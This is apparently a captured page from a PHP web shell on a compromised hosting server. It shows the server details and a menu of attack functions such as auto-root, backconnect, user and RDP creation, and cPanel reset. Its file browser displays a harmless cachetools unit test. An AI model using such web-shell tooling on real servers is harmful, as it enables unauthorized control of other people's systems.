Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
gsutil /
third_party /
cachetools /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.py
9.51
KB
-rw-r--r--
test_cache.py
148
B
-rw-r--r--
test_cached.py
8.19
KB
-rw-r--r--
test_cachedmethod.py
6.89
KB
-rw-r--r--
test_fifo.py
1.34
KB
-rw-r--r--
test_func.py
5.26
KB
-rw-r--r--
test_keys.py
4.66
KB
-rw-r--r--
test_lfu.py
1.17
KB
-rw-r--r--
test_lru.py
1.34
KB
-rw-r--r--
test_mru.py
1.87
KB
-rw-r--r--
test_rr.py
831
B
-rw-r--r--
test_tlru.py
7.96
KB
-rw-r--r--
test_ttl.py
5.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test_rr.py
import unittest from cachetools import RRCache from . import CacheTestMixin class RRCacheTest(unittest.TestCase, CacheTestMixin): Cache = RRCache def test_rr(self): cache = RRCache(maxsize=2, choice=min) self.assertEqual(min, cache.choice) cache[1] = 1 cache[2] = 2 cache[3] = 3 self.assertEqual(2, len(cache)) self.assertEqual(2, cache[2]) self.assertEqual(3, cache[3]) self.assertNotIn(1, cache) cache[0] = 0 self.assertEqual(2, len(cache)) self.assertEqual(0, cache[0]) self.assertEqual(3, cache[3]) self.assertNotIn(2, cache) cache[4] = 4 self.assertEqual(2, len(cache)) self.assertEqual(3, cache[3]) self.assertEqual(4, cache[4]) self.assertNotIn(0, cache)
Close